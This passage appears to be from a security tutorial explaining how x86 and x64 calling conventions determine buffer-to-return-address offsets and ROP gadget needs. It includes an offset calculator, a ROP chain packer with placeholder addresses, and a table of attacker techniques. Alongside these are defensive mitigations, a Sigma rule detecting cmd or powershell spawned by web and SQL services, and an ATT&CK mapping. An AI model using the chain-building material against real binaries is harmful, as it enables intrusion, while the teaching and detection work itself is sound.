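On Windows x64, the 32-byte shadow space does not sit between a function's local buffer and its own return address: the home slots reserved by the caller lie directly above the return address, and the slots the function reserves for its own callees lie at the bottom of its frame. What changes is what an overflow reaches after the return address (the four home slots, then stack arguments) and where a ROP chain must leave room, because a called function may spill RCX/RDX/R8/R9 into the 32 bytes above its return address. Forgetting that is a classic source of off-by-32 errors when porting chains between Linux and Windows.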

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv):
    """Bytes from the start of a local buffer to the saved return address.

    Assumes the buffer sits directly below the saved frame pointer,
    with no canary, padding, or other locals in between.
    """
    if conv in ("x86_cdecl", "x86_stdcall"):
        return buf_size + 4            # + saved EBP (4 bytes)
    if conv in ("sysv_amd64", "ms_x64"):
        # + saved RBP (8 bytes); the Windows shadow space lies above the
        # return address, so it does not add to this distance
        return buf_size + 8
    raise ValueError("unknown convention")

Frame-pointer presence (-fomit-frame-pointer removes saved RBP), stack canaries, and alignment padding all change the answer, which is why convention awareness precedes any reliable payload.

Flow diagram of a ROP chain on System V AMD64 showing overflow redirecting to a pop-rdi-ret gadget loading arg1 into RDI, then a pop-rsi-ret gadget loading arg2 into RSI, before jumping to a libc function — Every ROP gadget that loads a register is a direct consequence of the ABI — on System V you need pop rdi; ret for arg 1 because the convention mandates RDI, not the stack.
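The stack image that such a chain occupies can be written out byte for byte, which is also useful when reading a crash dump after an attempted exploit. The sketch below only packs integers; every address in it (the gadget, the argument, the target) is a made-up placeholder, and the padding length is an assumption that would come from offset analysis of a specific binary.

```python
import struct


def build_chain(padding_len, pop_rdi_ret, arg1, target):
    """Lay out filler, gadget address, argument, and call target as 64-bit little-endian words."""
    chain = b"A" * padding_len                # filler up to the saved return address
    chain += struct.pack("<Q", pop_rdi_ret)   # overwrites the return address: RET jumps to the gadget
    chain += struct.pack("<Q", arg1)          # the gadget's POP RDI consumes this word
    chain += struct.pack("<Q", target)        # the gadget's RET consumes this word
    return chain


# All values below are hypothetical placeholders.
chain = build_chain(padding_len=72, pop_rdi_ret=0x401234, arg1=0x404000, target=0x401050)
print(len(chain), chain[72:80].hex())
```

The order of the three words mirrors the ABI: the register-loading gadget comes first because System V expects argument 1 in RDI before the function is entered.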

10. Common Attacker Techniques

Technique	Description
Saved return-address overwrite	Overflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86)	Stack-arranged args (cdecl) let an attacker call `system()` without shellcode
ROP register loading (x64)	Use `pop rdi ; ret` / `pop rcx ; ret` gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivot	Account for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decoration	Resolve `_func@N` decorated stdcall imports for shellcode loaders
Reflective API calls	Manually set up RCX/RDX/R8/R9 + shadow space before invoking `LoadLibraryA`

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.

11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

Stack canaries — /GS (MSVC), -fstack-protector-strong (GCC/Clang) detect return-address overwrite before RET.
Control Flow Guard — /guard:cf validates indirect CALL targets.
Intel CET / Shadow Stack: hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Link with /CETCOMPAT (MSVC), which sets IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT (0x0001) in the image's extended DLL characteristics.
ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
-mno-red-zone — hardens Linux kernel modules against red-zone clobbering.

Runtime telemetry for the exploitation aftermath:

Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
Sysmon Event ID 10 (Process Access): cross-process handle opens with write or allocate access rights, the step that precedes VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
Audit Process Creation (Event 4688) with command-line logging.

title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high
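To sanity-check the rule's logic against exported events before deploying it, the selection can be mirrored in a few lines of Python. This is a sketch, not a Sigma engine: it assumes events arrive as dictionaries keyed by the Sysmon field names used in the rule, and the function name matches_rule is hypothetical.

```python
PARENTS = ("\\w3wp.exe", "\\sqlservr.exe")
CHILDREN = ("\\cmd.exe", "\\powershell.exe")


def matches_rule(event):
    """Return True when a Sysmon process-create event satisfies the selection."""
    if event.get("EventID") != 1:
        return False
    # Sigma string matching is case-insensitive by default, so compare lowercase.
    parent = str(event.get("ParentImage", "")).lower()
    image = str(event.get("Image", "")).lower()
    return parent.endswith(PARENTS) and image.endswith(CHILDREN)


sample = {
    "EventID": 1,
    "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
    "Image": "C:\\Windows\\System32\\cmd.exe",
}
print(matches_rule(sample))
```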

12. Tools for Calling-Convention Analysis

Tool	Description	Link
IDA Pro / Ghidra	Decompiler ABI inference and stack-frame reconstruction	ghidra-sre.org
x64dbg	Live register/stack inspection on Windows	x64dbg.com
GDB + pwndbg	Stack and register view on Linux (`x/16gx $rsp`)	gnu.org
WinDbg	Inspect shadow space and frame layout (`dd rsp`)	microsoft.com
Godbolt Compiler Explorer	Compare emitted asm across conventions/compilers	godbolt.org
ROPgadget / Ropper	Enumerate `pop rdi ; ret`-style register-loading gadgets	github.com
NASM	Hand-assemble convention test cases	nasm.us
Radare2	Cross-platform disassembly and ABI heuristics	rada.re

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Crash telemetry, Event `4688` child-process anomalies
Exploit Public-Facing Application	`T1190`	WAF/IDS, anomalous service children (Event ID 1)
Process Injection	`T1055`	Sysmon Event ID 10 (`VirtualAllocEx`/`WriteProcessMemory`)
Process Injection: DLL Injection	`T1055.001`	Event ID 7 unexpected `LoadLibraryA` loads
Command and Scripting Interpreter	`T1059`	Event ID 1 `cmd.exe`/`powershell.exe` spawns
Reflective Code Loading	`T1620`	ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.

Summary

Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.
